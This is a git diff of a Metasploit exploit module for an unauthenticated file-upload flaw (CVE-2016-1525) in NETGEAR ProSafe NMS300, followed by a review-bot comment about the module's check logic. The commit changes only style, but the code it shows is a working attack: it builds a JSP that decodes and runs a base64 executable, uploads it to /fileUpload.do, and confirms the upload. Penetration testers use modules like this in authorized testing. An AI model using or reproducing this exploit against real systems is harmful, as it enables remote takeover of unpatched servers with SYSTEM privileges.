Made style changes requested by OJ and others
parent
1f4324f686
commit
044b12d3a4
|
@ -5,7 +5,7 @@
|
|||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
|
||||
The application has a file upload vulnerability that can be exploited by an
|
||||
unauthenticated remote attacker to execute code as the SYSTEM user.
|
||||
Two servlets are vulnerable, FileUploadController (located at
|
||||
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
|
||||
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
|
||||
1.1.0.13.
|
||||
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
|
||||
The application has a file upload vulnerability that can be exploited by an
|
||||
unauthenticated remote attacker to execute code as the SYSTEM user.
|
||||
Two servlets are vulnerable, FileUploadController (located at
|
||||
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
|
||||
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
|
||||
1.1.0.13.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -32,8 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2016-1525'],
|
||||
['US-CERT-VU', '777024'],
|
||||
['URL', 'TODO_GITHUB_URL'],
|
||||
['URL', 'TODO_FULLDISC_URL']
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 5 },
|
||||
'Platform' => 'win',
|
||||
|
@ -60,9 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'GET'
|
||||
})
|
||||
if res && res.code == 405
|
||||
return Exploit::CheckCode::Detected
|
||||
Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
base64_exe = Rex::Text.encode_base64(exe)
|
||||
payload_name = rand_text_alpha(rand(6)+3)
|
||||
|
||||
var_raw = rand_text_alpha(rand(8) + 3)
|
||||
var_ostream = rand_text_alpha(rand(8) + 3)
|
||||
var_buf = rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = rand_text_alpha(rand(8) + 3)
|
||||
var_tmp = rand_text_alpha(rand(8) + 3)
|
||||
var_path = rand_text_alpha(rand(8) + 3)
|
||||
var_proc2 = rand_text_alpha(rand(8) + 3)
|
||||
var_raw = 'a' + rand_text_alpha(rand(8) + 3)
|
||||
var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
|
||||
var_buf = 'c' + rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
|
||||
var_tmp = 'e' + rand_text_alpha(rand(8) + 3)
|
||||
var_path = 'f' + rand_text_alpha(rand(8) + 3)
|
||||
var_proc2 = 'e' + rand_text_alpha(rand(8) + 3)
|
||||
|
||||
jsp = %Q|
|
||||
<%@page import="java.io.*"%>
|
||||
|
@ -102,10 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
%>
|
||||
|
|
||||
|
||||
jsp = jsp.gsub(/\n/, '')
|
||||
jsp = jsp.gsub(/\t/, '')
|
||||
jsp = jsp.gsub(/\x0d\x0a/, "")
|
||||
jsp = jsp.gsub(/\x0a/, "")
|
||||
jsp.gsub!(/[\n\t\r]/, '')
|
||||
|
||||
return jsp
|
||||
end
|
||||
|
@ -115,9 +112,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jsp_payload = generate_jsp_payload
|
||||
|
||||
jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
|
||||
jsp_full_name = "null" + jsp_name + ".jsp"
|
||||
jsp_full_name = "null#{jsp_name}.jsp"
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(jsp_name, nil, nil, "form-data; name=\"name\"")
|
||||
post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
|
||||
post_data.add_part(jsp_payload,
|
||||
"application/octet-stream", 'binary',
|
||||
"form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
|
||||
|
@ -130,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => data,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
|
||||
})
|
||||
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name + ".jsp"}"/
|
||||
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
|
||||
print_status("#{peer} - Payload uploaded successfully")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
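Review bot: In the check hunk (`@ -60,9 +60,9 @`), the `else` branch still returns `Exploit::CheckCode::Safe` when `res` is nil, so a timeout or refused connection is reported the same way as a host that answered with something other than 405. Anyone relying on `check` to triage exposure gets a false "safe" result for a host that was never actually reached. A guard such as `return Exploit::CheckCode::Unknown unless res` before the `if` would keep `Safe` for real non-405 replies only. The method begins above the hunk, so the request it sends is only partly visible here.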
|
||||
|
|